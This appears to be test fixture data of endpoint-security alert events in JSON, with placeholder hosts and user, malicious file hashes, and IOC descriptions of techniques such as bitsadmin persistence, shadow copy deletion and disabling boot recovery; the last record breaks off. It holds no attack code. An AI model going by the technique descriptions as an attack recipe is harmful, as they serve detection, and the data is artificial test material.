-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud 